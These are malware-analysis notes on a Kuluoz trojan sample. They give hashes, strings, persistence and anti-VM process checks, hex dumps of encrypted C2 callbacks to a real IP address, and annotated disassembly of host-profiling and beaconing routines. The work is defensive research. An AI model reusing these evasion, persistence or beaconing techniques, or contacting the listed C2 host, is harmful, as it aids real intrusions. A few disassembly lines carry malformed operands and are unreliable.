- # MalwareMustDie! Kuluoz Reversing Notes | @unixfreaxjp
- ================================================================================
- Size: 134656
- MD5: 22f7171ebb630b38cbfc288ccfea9b91
- SHA1: fae4a4bb291577379e15ea244d004667b902ab80
- SHA256: 360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe
- VT: https://www.virustotal.com/en/file/360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe/analysis/
- Malvert: https://lh4.googleusercontent.com/-jia-_8n-2Og/Uv6fkrqjH6I/AAAAAAAAOnQ/4NTsHPMkUTw/s600/KU110100101.png
- 検知率は駄目…関係ないマルウェア名だらけで検知された(FAIL!): https://lh6.googleusercontent.com/-H9scD705q9M/Uv6gpsW1d8I/AAAAAAAAOnY/HeALnilCrEk/s1212/KU000001.png
- Traffic: https://lh6.googleusercontent.com/-Nv-h8wIhJCE/Uv6fkugVA1I/AAAAAAAAOnM/yX5m0hRjCQY/s600/KU1111111.png
- ================================================================================
- PE Information
- Sections:
- .text 0x1000 0x11cce 73216
- .code 0x13000 0x1a5 512
- .rdata 0x14000 0x300e 12800
- .data 0x18000 0xe1dc 45056
- .rsrc 0x27000 0x720 2048
- [0x00000000:0x00400000]> x
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 2F 32 53 74 6B 53 3D 27 6B 53 3D 27 6B 53 3D 27 /2StkS=`kS=`kS=`
- 0090 4C 95 40 27 7B 53 3D 27 4C 95 53 27 73 53 3D 27 L.@`{S=`L.S`sS=`
- [...]
- [0x00000000:0x00400000]> !date
- Sat Feb 15 07:14:24 JST 2014
- // ===========
- // SUMMARY
- // ===========
- // Compiler..
- Microsoft Visual C++ Runtime Library
- // Same templates:
- {
- <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time>
- <version>%d</version><status>%d</status><debug>%s</debug></knock> }
- // Autostart persistence, the usual Run key:
- { Software\Microsoft\Windows\CurrentVersion\Run }
- // Attached is a typical first callback of the latest Kuluoz version:
- (pic)
- // Software the sample checks for:
- {wireshark.exe
- vmusrvc.exe
- VBoxService.exe
- SharedIntApp.exe
- prl_tools.exe
- prl_cc.exe
- vmsrvc.exe
- vmtoolsd.exe
- iptools.exe
- VBoxTray.exe }
- // Public key for decrypt:
- -----BEGIN PUBLIC KEY-----
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I
- Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
- jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
- 00SNFZ88nyVv33z9+wIDAQAB
- -----END PUBLIC KEY-----
- // gates path:
- /index.php?r=gate
- // if you know C maybe you can guess this :-))
- %1024[^=]=%1024[^;]
- // template URL
- http://%[^:]:%d/%s
- // C&C reply, decoded:
- STATUS_NO_CALLBACK_ACTIVE
- //=========================
- // TRAFFIC OF TWO TEST PC
- //=========================
- // Take one...
- 00000000 50 4f 53 54 20 2f 34 37 39 42 36 39 39 37 33 36 POST /47 9B699736
- 00000010 38 33 31 39 39 30 42 46 35 35 46 46 44 32 32 37 831990BF 55FFD227
- 00000020 37 43 44 42 33 38 45 32 46 31 39 45 35 32 45 32 7CDB38E2 F19E52E2
- 00000030 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 HTTP/1. 1..Accep
- 00000040 74 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d t: */*.. Content-
- 00000050 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f Type: ap plicatio
- 00000060 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c n/x-www- form-url
- 00000070 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 encoded. .User-Ag
- 00000080 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
- 00000090 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 (Window s NT 6.1
- 000000A0 3b 20 57 4f 57 36 34 3b 20 72 76 3a 32 35 2e 30 ; WOW64; rv:25.0
- 000000B0 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 ) Gecko/ 20100101
- 000000C0 20 46 69 72 65 66 6f 78 2f 32 35 2e 30 0d 0a 48 Firefox /25.0..H
- 000000D0 6f 73 74 3a 20 38 35 2e 32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
- 000000E0 36 34 3a 34 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 64:443.. Content-
- 000000F0 4c 65 6e 67 74 68 3a 20 33 30 38 0d 0a 43 61 63 Length: 308..Cac
- 00000100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
- 00000110 61 63 68 65 0d 0a 0d 0a 80 00 00 00 46 41 e6 45 ache.... ....FA.E
- 00000120 81 6f e6 0a 84 d5 a1 63 99 a0 65 bb 57 e5 e4 cc .o.....c ..e.W...
- 00000130 c1 a6 c6 33 be ca 73 d1 cc 02 30 87 c9 00 75 3f ...3..s. ..0...u?
- 00000140 42 f2 80 79 b8 c7 79 f7 8c f9 9c 7b f2 16 6d 37 B..y..y. ...{..m7
- 00000150 08 59 92 5e 4f 1b 97 47 08 4f 5b 9f e0 3a 29 aa .Y.^O..G .O[..:).
- 00000160 12 b4 db 6a be 20 10 97 a9 5c 3c 65 d4 98 d9 f8 ...j. .. .\<e....
- 00000170 40 fc ea d3 47 4d 8f ff a0 0a 77 43 03 24 f1 6c @...GM.. ..wC.$.l
- 00000180 91 4e 95 15 1f 6e d1 3c 88 6d 41 8a 35 23 fa cb .N...n.< .mA.5#..
- 00000190 32 0f 55 0d e5 3a 2a 61 c2 8d 83 37 ac 00 00 00 2.U..:*a ...7....
- 000001A0 14 a9 f9 fe 25 f2 dc 9d 6d da 75 3e c6 9a 4d 4f ....%... m.u>..MO
- 000001B0 e9 72 20 6e a4 ec ac 4b 0f 53 e7 74 8d 5f 09 da .r n...K .S.t._..
- 000001C0 f0 86 d4 6f c7 9c d3 e0 dc 3e 22 33 c0 64 6a f9 ...o.... .>"3.dj.
- 000001D0 3e ad 22 c7 52 2d 59 46 75 ce 47 7e 68 77 b2 6b >.".R-YF u.G~hw.k
- 000001E0 66 1c ce a4 38 df bd d0 b3 65 9e c4 0a 20 d9 5b f...8... .e... .[
- 000001F0 d5 29 ed e2 b0 78 e6 22 ac 08 b3 c2 66 59 88 38 .)...x." ....fY.8
- 00000200 e6 40 fc 12 b7 71 4a 6c f5 6a bd 5d 9b 2a 82 26 .@...qJl .j.].*.&
- 00000210 44 9b b3 2a f3 12 be d0 83 8d ec 12 a2 a2 b9 58 D..*.... .......X
- 00000220 e8 e3 5d 74 53 0b c6 be 09 b6 e8 bc 69 b0 86 fa ..]tS... ....i...
- 00000230 77 7d 60 99 50 bd 2e 54 e4 bb 2c 54 07 67 1a 23 w}`.P..T ..,T.g.#
- 00000240 d8 00 86 23 00 66 f3 a3 2a 81 e9 47 ...#.f.. *..G
- 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
- 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
- 00000020 2e 32 2e 36 0d 0a 44 61 74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
- 00000030 20 31 34 20 46 65 62 20 32 30 31 34 20 31 35 3a 14 Feb 2014 15:
- 00000040 30 38 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 08:52 GM T..Conte
- 00000050 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 nt-Type: text/ht
- 00000060 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d ml; char set=utf-
- 00000070 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
- 00000080 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
- 00000090 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 onnectio n: close
- 000000A0 0d 0a 0d 0a 65 66 0d 0a 80 00 00 00 07 6a 06 61 ....ef.. .....j.a
- 000000B0 12 2c 66 a2 d3 00 14 36 9d 35 60 ac ec d6 14 7b .,f....6 .5`....{
- 000000C0 7e f3 70 59 96 41 09 9d 7c 82 c7 58 d9 82 d9 e9 ~.pY.A.. |..X....
- 000000D0 44 eb 6d 98 50 41 3f 38 34 04 39 c5 da 51 72 c7 D.m.PA?8 4.9..Qr.
- 000000E0 12 af 62 16 14 b4 59 66 4e b2 2f 54 8e 23 86 dd ..b...Yf N./T.#..
- 000000F0 b4 e4 b0 01 d5 6d 0b 60 77 4c 02 7b 60 8a 7b 74 .....m.` wL.{`.{t
- 00000100 27 ae 68 18 53 96 9b 02 d1 72 bc 8b 03 36 e0 0b `.h.S... .r...6..
- 00000110 bf e2 8c 4c 14 d9 7d f0 53 12 e0 2b a2 26 12 c7 ...L..}. S..+.&..
- 00000120 94 8f 60 04 40 9b 46 a1 a4 51 af c1 67 00 00 00 ..`.@.F. .Q..g...
- 00000130 14 a9 f9 fe 25 f2 dc 9d 6d da 4c 3a 1d b5 4d 4f ....%... m.L:..MO
- 00000140 db b2 20 3e b4 33 09 ae ea 67 ca 86 06 a0 09 ae .. >.3.. .g......
- 00000150 b4 25 6f c2 5b 53 5a 22 78 87 ec 95 0d 63 5f 49 .%o.[SZ" x....c_I
- 00000160 09 54 54 be 5d 20 3b a7 5f 8d d3 09 8c be 8e 8d .TT.] ;. _.......
- 00000170 b8 cc a9 8b ea 47 fc 30 1e 7e 1e fc d1 68 ec ef .....G.0 .~...h..
- 00000180 84 25 50 90 f3 a9 4f 6c b3 fa d4 36 08 5b 59 92 .%P...Ol ...6.[Y.
- 00000190 f9 fc 9c 87 f5 1a df 0d 0a 30 0d 0a 0d 0a ........ .0....
- // Take two...
- 00000000 50 4f 53 54 20 2f 44 43 43 35 32 33 44 43 38 34 POST /DC C523DC84
- 00000010 42 41 41 35 46 44 46 37 38 35 36 46 39 38 46 37 BAA5FDF7 856F98F7
- 00000020 39 30 35 46 38 38 38 33 42 32 43 38 36 33 43 30 905F8883 B2C863C0
- 00000030 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 HTTP/1. 1..Accep
- 00000040 74 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d t: */*.. Content-
- 00000050 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f Type: ap plicatio
- 00000060 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c n/x-www- form-url
- 00000070 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 encoded. .User-Ag
- 00000080 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
- 00000090 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 (Window s NT 6.1
- 000000A0 3b 20 57 4f 57 36 34 3b 20 72 76 3a 32 35 2e 30 ; WOW64; rv:25.0
- 000000B0 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 ) Gecko/ 20100101
- 000000C0 20 46 69 72 65 66 6f 78 2f 32 35 2e 30 0d 0a 48 Firefox /25.0..H
- 000000D0 6f 73 74 3a 20 38 35 2e 32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
- 000000E0 36 34 3a 34 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 64:443.. Content-
- 000000F0 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 61 63 Length: 309..Cac
- 00000100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
- 00000110 61 63 68 65 0d 0a 0d 0a 80 00 00 00 f1 47 79 19 ache.... .....Gy.
- 00000120 3f 84 3c f8 82 0f df f0 5c 88 a2 77 17 4c 24 0d ?.<..... \..w.L$.
- 00000130 58 20 03 b0 7c 0a f0 f7 f8 59 0a 91 28 9c fa 05 X ..|... .Y..(...
- 00000140 15 7e e6 2b 69 ab 0a 50 89 95 8e 19 12 57 3f 1b .~.+i..P .....W?.
- 00000150 11 7e 74 4e 11 c5 b1 a8 f5 48 61 2e f0 c2 89 97 .~tN.... .Ha.....
- 00000160 ab 6c 2a ec c6 bd bd a3 20 d6 b6 d0 d6 5e e7 5a .l*..... ....^.Z
- 00000170 b2 c6 74 d9 88 91 d6 7d 86 ac 60 a1 53 81 a1 6e ..t....} ..`.S..n
- 00000180 9f 2d ce b4 dc f5 d9 36 d1 ad 31 00 10 cb 11 07 .-.....6 ..1.....
- 00000190 7a a2 c0 89 8c 84 63 9b ed 8c 5e 52 ad 00 00 00 z.....c. ..^R....
- 000001A0 31 95 f9 a1 4d 42 70 93 dd 40 0b 1f c5 27 5e cd 1...MBp. .@...`^.
- 000001B0 83 30 91 c8 59 c4 bf 70 2f a0 04 31 c7 28 f9 6e .0..Y..p /..1.(.n
- 000001C0 bc b4 16 e7 42 11 16 b2 6e a6 1c 33 ca 60 1e 4d ....B... n..3.`.M
- 000001D0 3c 9e 8f 93 20 8c e0 3c c3 56 a5 3e 72 b9 97 2e <... ..< .V.>r...
- 000001E0 7f d3 68 e2 ea 78 b0 96 74 e3 06 4a 01 1f 92 f2 ..h..x.. t..J....
- 000001F0 27 60 e6 29 b8 92 1e 65 02 8e a4 58 4f e2 72 8b ``.)...e ...XO.r.
- 00000200 9d 23 09 d3 93 ff 09 aa a3 65 90 03 ae bb 52 c8 .#...... .e....R.
- 00000210 22 b8 70 10 b8 c9 04 3f 72 ea 38 d0 96 75 69 67 ".p....? r.8..uig
- 00000220 e3 25 f1 f0 d8 4c 7f df b0 79 96 0f f9 1e 0f 61 .%...L.. .y.....a
- 00000230 27 1c 3d 11 e4 78 f7 a4 84 dc 66 05 b4 c8 07 8a `.=..x.. ..f.....
- 00000240 f5 a6 95 a6 6b 5e 85 b1 6f cc 81 a9 72 ....k^.. o...r
- 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
- 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
- 00000020 2e 32 2e 36 0d 0a 44 61 74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
- 00000030 20 31 34 20 46 65 62 20 32 30 31 34 20 31 34 3a 14 Feb 2014 14:
- 00000040 33 36 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 36:26 GM T..Conte
- 00000050 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 nt-Type: text/ht
- 00000060 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d ml; char set=utf-
- 00000070 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
- 00000080 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
- 00000090 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 onnectio n: close
- 000000A0 0d 0a 0d 0a 66 35 0d 0a 80 00 00 00 5e be 4e a5 ....f5.. ....^.N.
- 000000B0 91 74 d2 a7 f1 61 c8 0a 57 46 12 0c 61 62 11 22 .t...a.. WF..ab."
- 000000C0 61 0f 87 6b ac 12 3e 87 9d 71 57 59 82 fd ce 87 a..k..>. .qWY....
- 000000D0 8e 2c 8a fa a6 b6 d8 f8 03 d8 38 f7 09 59 9d d5 .,...... ..8..Y..
- 000000E0 f6 6d b9 72 79 ea f9 be b9 9d 66 94 92 f8 59 c2 .m.ry... ..f...Y.
- 000000F0 7d 6a 4b bd 19 4b 77 8d 06 6e e3 93 d6 46 24 15 }jK..Kw. .n...F$.
- 00000100 f9 b2 35 d1 74 9d 2e 76 68 67 8a 0c d1 83 ef 0b ..5.t..v hg......
- 00000110 b0 0f e0 a6 80 98 b3 14 0e e1 e3 c0 2f 6e 0b 73 ........ ..../n.s
- 00000120 c6 fa 2a 74 1d 78 b0 7a 0e 0d a0 20 6d 00 00 00 ..*t.x.z ... m...
- 00000130 31 95 f9 a1 4d 42 70 93 dd 40 ec 83 d9 19 5e cd 1...MBp. .@....^.
- 00000140 93 f0 91 98 49 3b 18 b0 ca b1 29 c3 4c d7 f9 1a ....I;.. ..).L...
- 00000150 f8 16 95 58 ed a4 3d 35 c7 cf 0f 7e 63 d2 8e ce ...X..=5 ...~c...
- 00000160 4c 39 a4 c1 9b 58 e0 7c 3f 08 9e 36 7f 3c 1a 67 L9...X.| ?..6.<.g
- 00000170 43 22 58 b1 09 e4 8a ab b2 27 fa 6c 03 b7 c1 83 C"X..... .`.l....
- 00000180 bf bb 4a f9 b1 64 3c de 53 14 92 51 c6 67 bc e1 ..J..d<. S..Q.g..
- 00000190 18 f3 b1 58 88 1a a5 24 70 00 bb 6c 9a 0d 0a 30 ...X...$ p..l...0
- 000001A0 0d 0a 0d 0a ....
- "
- // ===========
- // REVERSING..
- // ===========
- // Anti Debug??
- 0x38000E pop ebx
- 0x38000F sub ebx, 13h
- 0x380012 call 0x380224h target: 0x380224
- 0x380017 or eax, eax
- 0x380019 je 0x380141h target: 0x380141
- 0x38001F call dword ptr [ebx+00000525h] GetProcessHeap@KERNEL32.DLL [0 Params]
- // The self copy..
- 0x8D3BE0 call dword ptr [0x8DE0A0h] CreateFileA@KERNEL32.DLL [7 Params]
- 0x8D3BE6 mov dword ptr [ebp-0Ch], eax
- 0x8D3BE9 cmp dword ptr [ebp-0Ch], 00000000h
- 0x8D3BED je 0x8D3C21h target: 0x8D3C21
- 0x8D3BEF push 00000000h
- 0x8D3BF1 lea ecx, dword ptr [ebp-04h]
- 0x8D3BF4 push ecx
- 0x8D3BF5 mov edx, dword ptr [ebp+0Ch]
- 0x8D3BF8 push edx
- 0x8D3BF9 mov eax, dword ptr [ebp+08h]
- 0x8D3BFC push eax
- 0x8D3BFD mov ecx, dword ptr [ebp-0Ch]
- 0x8D3C00 push ecx
- 0x8D3C01 call dword ptr [0x8DE0A4h] WriteFile@KERNEL32.DLL [5 Params]
- 0x8D3C07 test eax, eax
- 0x8D3C09 je 0x8D3C17h target: 0x8D3C17
- // Create process (svchost.exe)
- 0x4114F7 push 0x4010C8h ASCII "svchost.exe"
- 0x4114FC push 00000000h
- 0x4114FE call dword ptr [0x40100Ch] CreateProcessA@KERNEL32.DLL [10 Params]
- 00411504 mov eax, dword ptr [ebp-000000ECh]
- // Specifically check the timezone...
- 0x41002A push 0x425FC0h xref: 0x41001B
- 0x41002F call dword ptr [0x4140F0h] GetTimeZoneInformation@KERNEL32.DLL [1 Params]
- 0x410035 cmp eax, edi
- 0x410037 je 0x4100FFh target: 0x4100FF
- 0x41003D xor ecx, ecx
- 0x41003F inc ecx
- // sleep...so many. why??
- 0x8D581A call dword ptr [0x8DE088h] Sleep@KERNEL32.DLL [1 Params]
- 0x8D5820 jmp 0x8D5831h xref: 0x8D5813 target: 0x8D5831
- 0x8D5822 mov eax, dword ptr [ebp-00000248h] xref: 0x8D57F4
- [...]
- 0x8D583F call dword ptr [0x8DE088h] Sleep@KERNEL32.DLL [1 Params]
- 0x8D5845 mov dword ptr [ebp-00000248h], 00000000h
- // Opening some services riding on svchost (several; I pasted one of them):
- 0x1003229 call dword ptr [0x1001124h] RpcServerUnregisterIfEx@RPCRT4.DLL [3 Params]
- 0x100322F mov esi, 0x1004094h
- 0x1003234 push esi
- 0x1003235 mov edi, eax
- 0x1003237 call dword ptr [0x100x1068h] EnterCriticalSection@KERNEL32.DLL [Unknown Params]
- 0x100323D dec dword ptr [0x1004090h]
- 0x1003243 jne 0x1003253h target: 0x1003253
- 0x1003245 push 00000000h
- 0x1003247 call dword ptr [0x1001144h] RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
- 0x100324D call dword ptr [0x1001128h] RpcMgmtWaitServerListen@RPCRT4.DLL [Unknown Params]
- 0x1003253 push esi xref: 0x1003243
- 0x1003254 call dword ptr [0x100x1060h] LeaveCriticalSection@KERNEL32.DLL [Unknown Params]
- 0x100325A push edi
- 0x100325B call dword ptr [0x1001140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- // Retrieving the system's user information:
- // User Name
- 0x8D2470 push ebp xref: 0x8D4F76
- 0x8D2471 mov ebp, esp
- 0x8D2473 sub esp, 0000009Ch
- 0x8D2479 mov dword ptr [ebp-1Ch], 00000000h
- 0x8D2480 mov dword ptr [ebp-08h], 00000000h
- 0x8D2487 mov dword ptr [ebp-18h], 00000000h
- 0x8D248E lea eax, dword ptr [ebp-18h]
- 0x8D2491 push eax
- 0x8D2492 push 00000000h
- 0x8D2494 call dword ptr [0x8DE02Ch] GetUserNameA@ADVAPI32.DLL [2 Params]
- 0x8D249A mov ecx, dword ptr [ebp-18h]
- 0x8D249D add ecx, 01h
- 0x8D24A0 push ecx
- 0x8D24A1 push 000000x8h
- 0x8D24A3 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D24A9 push eax
- 0x8D24AA call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D24B0 mov dword ptr [ebp-24h], eax
- 0x8D24B3 lea edx, dword ptr [ebp-18h]
- 0x8D24B6 push edx
- 0x8D24B7 mov eax, dword ptr [ebp-24h]
- 0x8D24BA push eax
- 0x8D24BB call dword ptr [0x8DE02Ch] GetUserNameA@ADVAPI32.DLL [2 Params]
- 0x8D24C1 mov dword ptr [ebp-18h], 00000000h
- 0x8D24C8 mov dword ptr [ebp-00000094h], 00000000h
- 0x8D24D2 lea ecx, dword ptr [ebp-0Ch]
- 0x8D24D5 push ecx
- 0x8D24D6 lea edx, dword ptr [ebp-00000094h]
- 0x8D24DC push edx
- 0x8D24DD push 00000000h
- 0x8D24DF lea eax, dword ptr [ebp-18h]
- 0x8D24E2 push eax
- // Account Name...
- 0x8D24E3 push 00000000h
- 0x8D24E5 mov ecx, dword ptr [ebp-24h]
- 0x8D24E8 push ecx
- 0x8D24E9 push 00000000h
- 0x8D24EB call dword ptr [0x8DE030h] LookupAccountNameA@ADVAPI32.DLL [7 Params]
- 0x8D24F1 mov edx, dword ptr [ebp-18h]
- 0x8D24F4 push edx
- 0x8D24F5 push 000000x8h
- 0x8D24F7 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D24FD push eax
- 0x8D24FE call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2504 mov dword ptr [ebp-08h], eax
- 0x8D2507 mov eax, dword ptr [ebp-00000094h]
- 0x8D250D add eax, 01h
- 0x8D2510 push eax
- 0x8D2511 push 000000x8h
- 0x8D2513 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D2519 push eax
- 0x8D251A call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2520 mov dword ptr [ebp-1Ch], eax
- 0x8D2523 lea ecx, dword ptr [ebp-0Ch]
- 0x8D2526 push ecx
- 0x8D2527 lea edx, dword ptr [ebp-00000094h]
- 0x8D252D push edx
- 0x8D252E mov eax, dword ptr [ebp-1Ch]
- 0x8D2531 push eax
- 0x8D2532 lea ecx, dword ptr [ebp-18h]
- 0x8D2535 push ecx
- 0x8D2536 mov edx, dword ptr [ebp-08h]
- 0x8D2539 push edx
- 0x8D253A mov eax, dword ptr [ebp-24h]
- 0x8D253D push eax
- 0x8D253E push 00000000h
- 0x8D2540 call dword ptr [0x8DE030h] LookupAccountNameA@ADVAPI32.DLL [7 Params]
- 0x8D2546 mov dword ptr [ebp-10h], 00000000h
- 0x8D254D mov dword ptr [ebp-20h], 00000004h
- 0x8D2554 lea ecx, dword ptr [ebp-04h]
- // Query the registry CurrentVersion key...
- 0x8D2557 push ecx
- 0x8D2558 push 00000001h
- 0x8D255A push 00000000h
- 0x8D255C push 0x8DE1FCh ASCII "Software\Microsoft\Windows NT\CurrentVersion"
- 0x8D2561 push 80000002h
- 0x8D2566 call dword ptr [0x8DE034h] RegOpenKeyExA@ADVAPI32.DLL [5 Params]
- 0x8D256C test eax, eax
- 0x8D256E jne 0x8D25A4h target: 0x8D25A4
- 0x8D2570 mov dword ptr [ebp-00000098h], 00000004h
- 0x8D257A lea edx, dword ptr [ebp-20h]
- 0x8D257D push edx
- 0x8D257E lea eax, dword ptr [ebp-10h]
- 0x8D2581 push eax
- 0x8D2582 lea ecx, dword ptr [ebp-00000098h]
- 0x8D2588 push ecx
- 0x8D2589 push 00000000h
- 0x8D258B push 0x8DE22Ch ASCII "InstallDate"
- 0x8D2590 mov edx, dword ptr [ebp-04h]
- 0x8D2593 push edx
- 0x8D2594 call dword ptr [0x8DE038h] RegQueryValueExA@ADVAPI32.DLL [6 Params]
- 0x8D259A mov eax, dword ptr [ebp-04h]
- 0x8D259D push eax
- 0x8D259E call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- 0x8D25A4 push 00001000h xref: 0x8D256E
- 0x8D25A9 push 00000000h
- 0x8D25AB mov ecx, dword ptr [0x8E12D8h] 0x00AC0000
- 0x8D25B1 push ecx
- [...]
- // Query the registry InstallDate value...
- 0x8D255C push 0x8DE1FCh ASCII "Software\Microsoft\Windows NT\CurrentVersion"
- 0x8D2561 push 80000002h
- 0x8D2566 call dword ptr [0x8DE034h] RegOpenKeyExA@ADVAPI32.DLL [5 Params]
- 0x8D256C test eax, eax
- 0x8D256E jne 0x8D25A4h target: 0x8D25A4
- 0x8D2570 mov dword ptr [ebp-00000098h], 00000004h
- 0x8D257A lea edx, dword ptr [ebp-20h]
- 0x8D257D push edx
- 0x8D257E lea eax, dword ptr [ebp-10h]
- 0x8D2581 push eax
- 0x8D2582 lea ecx, dword ptr [ebp-00000098h]
- 0x8D2588 push ecx
- 0x8D2589 push 00000000h
- 0x8D258B push 0x8DE22Ch ASCII "InstallDate"
- 0x8D2590 mov edx, dword ptr [ebp-04h]
- 0x8D2593 push edx
- 0x8D2594 call dword ptr [0x8DE038h] RegQueryValueExA@ADVAPI32.DLL [6 Params]
- 0x8D259A mov eax, dword ptr [ebp-04h]
- 0x8D259D push eax
- 0x8D259E call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- // Internet connection to send the POST...
- 0x8D2C00 push ebp xref: 0x8D2FDB
- 0x8D2C01 mov ebp, esp
- 0x8D2C03 sub esp, 34h
- 0x8D2C06 mov dword ptr [ebp-08h], 00000000h
- 0x8D2C0D push 00001000h
- 0x8D2C12 push 00000000h
- 0x8D2C14 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C19 push eax
- 0x8D2C1A call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C20 mov dword ptr [ebp-14h], eax
- 0x8D2C23 push 00001000h
- 0x8D2C28 push 00000000h
- 0x8D2C2A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C30 push ecx
- 0x8D2C31 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C37 mov dword ptr [ebp-0Ch], eax
- 0x8D2C3A mov edx, dword ptr [ebp-0Ch]
- 0x8D2C3D push edx
- 0x8D2C3E lea eax, dword ptr [ebp-1Ch]
- 0x8D2C41 push eax
- 0x8D2C42 mov ecx, dword ptr [ebp-14h]
- 0x8D2C45 push ecx
- 0x8D2C46 push 0x8DE2D0h ASCII "http://%[^:]:%d/%s"
- 0x8D2C4B mov edx, dword ptr [ebp+08h]
- 0x8D2C4E push edx
- 0x8D2C4F call dword ptr [008E12B4h] sscanf@NTDLL.DLL [0 Params]
- 0x8D2C55 add esp, 14h
- 0x8D2C58 push 00001000h
- 0x8D2C5D push 00000000h
- 0x8D2C5F mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C64 push eax
- 0x8D2C65 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C6B mov dword ptr [ebp-18h], eax
- 0x8D2C6E mov ecx, dword ptr [ebp+10h]
- 0x8D2C71 mov edx, dword ptr [ebp+18h]
- 0x8D2C74 lea eax, dword ptr [edx+ecx+00001000h]
- 0x8D2C7B push eax
- 0x8D2C7C push 00000000h
- 0x8D2C7E mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C84 push ecx
- 0x8D2C85 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C8B mov dword ptr [ebp-04h], eax
- 0x8D2C8E push 00000000h
- 0x8D2C90 push 00000000h
- 0x8D2C92 push 00000000h
- 0x8D2C94 push 00000000h
